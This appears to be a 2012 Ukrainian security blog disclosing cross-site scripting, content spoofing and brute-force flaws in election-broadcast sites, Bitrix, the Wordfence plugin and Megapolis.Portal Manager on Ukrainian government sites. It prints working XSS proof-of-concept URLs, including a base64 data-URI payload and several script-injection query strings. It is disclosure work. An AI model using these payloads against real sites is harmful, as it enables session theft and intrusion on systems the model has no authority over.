Websecurity - Веб безпека

Подібно до уразливості на vybory2012.gov.ua, аналогічна уразливість є на сайті http://webvybory2012.ru. Сьогодні я знайшов Cross-Site Scripting уразливість на цьому сайті, де відбувалася онлайн-трансляція на цьогорічних виборах президента Росії.

XSS:

• alert(document.cookie)
• цікавий

На сайті використовується той же дірявий флеш відео плеєр - з тією самою XSS уразливістю (лише версія флешки на українському сайті більш новіша, але вона так само дірява).

Як видно з цієї флешки та уразливості в ній, за безпекою російського сайту для трансляції виборів так само погано слідкували. А також видно те, що наші урядовці не тільки ідею відео-трансляцій скопіювали у росіян, так ще й той же флеш відео плеєр використали з аналогічною діркою. Самі вони ні до чого не спромоглися додумалися, в тому числі до проведення аудиту безпеки веб сайта.

Сьогодні в Україні вибори до Парламенту. Я вже проголосував і всім українцям, хто ще не встиг, раджу це зробити.

А тим часом зверну вашу увагу на дірявість сайта http://vybory2012.gov.ua, де відбувається онлайн-трансляція виборів. Сьогодні, ще перед голосуванням, я знайшов Cross-Site Scripting уразливість на цьому сайті (а також інші уразливості, ця одна з найменш небезпечних).

XSS:

• alert(document.cookie)
• цікавий

По капчам на всіх зовнішніх сторінках сайта здається, що vybory2012.gov.ua засекюрений. Але це лише на перший погляд. Як видно з цієї та інших дірок на сайті, за його безпекою особливо не слідкували. При тому що на веб камери для голосування, сюди ж входить і створення веб сайта, уряд виділив майже 1 мільярд гривень (993,6 мільйонів). Але, враховуючи розкрадання коштів, на безпеку не вистачило (подібно до інших державних сайтів).

20.08.2012

У серпні, 12.08.2012, я виявив численні Content Spoofing та Cross-Site Scripting уразливості в Bitrix Site Manager. Які обходять WAF та захисні фільтри Bitrix. Уразливості були виявлені на www.1c-bitrix.ua та www.1c-bitrix.ru. Про що на минулому тижні вже повідомив розробникам системи.

Раніше я вже писав про уразливості в Bitrix.

Детальна інформація про уразливості з’явиться пізніше.

20.10.2012

XSS:

http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?playerready=alert(document.cookie)

Та інші Content Spoofing та Cross-Site Scripting уразливості в JW Player, що використовується в Bitrix (версія JW Player Pro).

CS:

http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?abouttext=Player&aboutlink=http://site

XSS:

http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Уразливі Bitrix Site Manager 11.5 та попередні версії.

Розробник виправив уразливість в CMS шляхом видалення даного флеш файла.

В даній добірці уразливості в веб додатках:

• DomsHttpd 1.0 <= Remote Denial Of Service (деталі)
• Apache Wicket XSS vulnerability via manipulated URL parameter (деталі)
• SQL Injection in Dr.Web Anti-virus (деталі)
• SEO New York (prod.php?id) Remote SQL injection Vulnerability (деталі)
• RSA Authentication Manager Multiple Vulnerabilities (деталі)
• ES Job Search Engine v3.0 - SQL injection vulnerability (деталі)
• TP Link Gateway v3.12.4 - Multiple Web Vulnerabilities (деталі)
• eFront Enterprise v3.6.11 - Multiple Web Vulnerabilities (деталі)
• EMC Documentum Information Rights Management Multiple Vulnerabilities (деталі)
• Ektron CMS - Multiple Vulnerabilities (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Google Analytics, NextGEN Gallery та Tierra Audio. Для котрих з’явилися експлоіти. Google Analytics - це плагін для розміщення рахівника Analytics Гугла, NextGEN Gallery - це плагін для створення галерей зображень, Tierra Audio - це аудіо плагін.

• WordPress Google Analytics 4.2.4 Cross Site Scripting (деталі)
• WordPress NextGEN Gallery 1.9.5 Cross Site Scripting (деталі)
• WordPress Tierra Audio Path Disclosure (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Сьогодні я виявив Cross-Site Scripting та Insufficient Anti-automation уразливості в плагіні Wordfence Security. Це секюріті плагін для WordPress. Дані уразливості я виявив на security-testlab.com. Про що найближчим часом повідомлю розробникам веб додатку.

Стосовно плагінів для WordPress раніше я писав про уразливості в Floating Tweets.

XSS:

Wordfence Security XSS.html

Insufficient Anti-automation:

Wordfence Security IAA.html

Немає захисту (капчі) від автоматизованого підбору емайла адміна. А якщо знати емайл адміна, то таким чином можна буде автоматизовано спамити йому листами з сайта.

Уразливі Wordfence Security 3.3.5 та попередні версії.

P.S.

Після мого повідомлення, розробник виправив дані уразливості в версії 3.3.7. Але при цьому IAA дірка була виправлена неякісно.

06.06.2012

Сьогодні я знайшов Brute Force та Insufficient Anti-automation уразливості (не кажучи вже про всі інші дірки в WordPress) на http://security-testlab.com - сайті секюріті компанії Security-TestLab. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

18.10.2012

Сайт на WordPress, тому в ньому наявні всі дірки, що є в цьому движку (а існує багато дірок, про які я писав, що багато років наявні в ньому і не виправляються розробника WP). На сайті використовується стара версія WordPress 3.4.1, тому в ньому є всі ті дірки, що були виправлені в WordPress 3.4.2.

Brute Force:

В WP э п’ять BF дірок, що мають місце на цьому сайті. Як на http://security-testlab.com/wp-login.php, так й інші. Як раз на wp-login.php вони вже виправили BF уразливість.

Insufficient Anti-automation:

http://security-testlab.com/kontakty/

В контактній формі немає захисту від автоматизованих запитів (капчі).

Дані уразливості досі не виправлені, окрім однієї BF (але блокування відбувається на дуже короткий термін). При цьому встановивши Wordfence плагін для захисту від BF в формі логіна, адміни сайта додали ще дві уразливості - XSS й IAA в самому плагіні. Про які я згодом напишу.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах ABC-Test, Archin та Token Manager. Для котрих з’явилися експлоіти. ABC-Test - це плагін для проведення тестування, Archin - це комерційна (преміум) тема движка, Token Manager - це плагін для створення компонентів під час розробки для даної CMS.

• WordPress ABC-Test 0.1 Cross Site Scripting (деталі)
• WordPress Archin Cross Site Scripting (деталі)
• Wordpress Plugin Token Manager Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• Certain HP Photosmart Printers, Remote Denial of Service (DoS) (деталі)
• Joomla 2.5.6 Multiple Cross-site scripting vulnerabilities (деталі)
• gajim security update (деталі)
• Atlassian Confluence - Multiple Cross-Site Request Forgery (CSRF) Vulnerabilities (деталі)
• HP DataDirect OpenAccess oaagent.exe GIOP Remote Code Execution Vulnerability (деталі)
• XSS in OSSEC wui 0.3 (деталі)
• HP DataDirect OpenAccess GIOP Parsing Remote Code Execution Vulnerability (деталі)
• Microcart 1.0 Checkout Cross-Site Scripting Security Vulnerability (деталі)
• HP DataDirect OpenAccess GIOP Opcode 0×0E Remote Code Execution Vulnerability (деталі)
• Microcart 1.0 _Admin Cross-Site Scripting Security Vulnerability (деталі)

13.07.2012

У липні я знайшов численні Cross-Site Scripting уразливості в Megapolis.Portal Manager. Це комерційна CMS від компанії Cофтлайн. Дірки я виявив на сайтах www.kmu.gov.ua та portal.rada.gov.ua. Про що найближчим часом повідомлю розробникам.

Окрім сайтів Кабміну і Парламенту інші сайти на даному движку, зокрема українські державні сайти, також можуть бути уразливі. Раніше я вже писав про уразливість в Megapolis.Portal Manager (до якої були вразливі десятки сайтів в Україні).

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

06.10.2012

XSS:

http://site/control/news?date=04.07.2012'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/control/news?cat_id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/control/uk/publish/category/news_left?cat_id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/control/uk/publish/category/news_left/news_left?cat_id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/control/uk/publish/category/news_left?from=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/control/uk/publish/category/news_left/news_left?from=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/control/uk/publish/category/news_left?to=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/control/uk/publish/category/news_left/news_left?to=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Дані уразливості досі не виправлені. Розробник Megapolis.Portal Manager відмовився їх виправляти.